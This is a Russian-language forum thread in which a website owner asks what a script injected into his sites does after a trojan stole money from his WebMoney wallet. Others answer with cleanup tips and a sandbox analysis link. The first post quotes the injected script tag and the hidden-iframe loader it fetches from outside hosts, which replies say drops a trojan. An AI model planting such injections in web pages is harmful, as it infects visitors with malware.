Что это за скрипт?

На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код

Code:

<script src=http://flo4.cn/1.txt></script>

По адресу flo4.cn/1.txt соответственно находится такой скрипт:

Code:

document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");

Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
Интересно, что происходит при срабатывании этого скрипта в конечном итоге?

 

во первых- почисть host -папочку !! во вторых я думаю что сам панимаеш что ето значит document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5 !!! посмотри host файлы - там наверника что то левое !!((

 

LeRick - а вопше то юзай поиском по iframe ! http://forum.antichat.ru/search.php?searchid=5058055&pp=25&page=1

 

в этом айфрейме подгрузчик трояна

 

У меня вопрос: а как смогли с WebMoney баки потянуть?
Возможно, троян - всего лишь маскировка?

 

Не знаю, я ж не специалист
Кипер на компе был онлайн. WMZ перевели через обменник на яндекс-деньги. Возможно, меня не было за компом в это время. Не помню. Увидел позже сообщение об авторизации и пустой вмз кошелек. WMR не тронули, хотя там больше было, чем на вмз. У меня в настройках была включена возможность совершения операций через кипер-мини. Скорее всего этим и воспользовались...
После этого я отключил использование кипер-мини, сменил пароль, сделал новый файл ключей и установил активацию через телефон, а не через мэйл. А через пару дней получаю смску с кодом для активации кипера на другом компе. Видимо, опять пытались забраться в кошелек

 

кажетсо шо у тебя бекдор !встанови фаэрвол !! )))

 

Фаервол стоял. Комодо. Вчера снес его и поставил старый добрый Аутпост
Зашел на страничку с таким ифреймом и Аутпост сразу доложил об подозрительных действиях. В папку Windows/Temp загружается файл экзешный и пытается изменить explorer.exe и еще парочку прог винды.
Больше ничего подозрительного не замечал. Сегодня с утра проверил полностью комп антивирусом и воспользовался помощью на сайте virusinfo. Сказали, что в логах, которые я им отослал, ничего подозрительного нет.

 

У меня даже уведомление об ответе в этой теме антивирус на почту не пропускает.

"Держите штаны крепче, господа" (с)

 

Читайте отчет. Оттуда и связку можно дернуть и малвару их пореверсить
http://wepawet.iseclab.org/view.php?hash=d91da88baf6ef98f1c3552742ff66a76&t=1251968690&type=js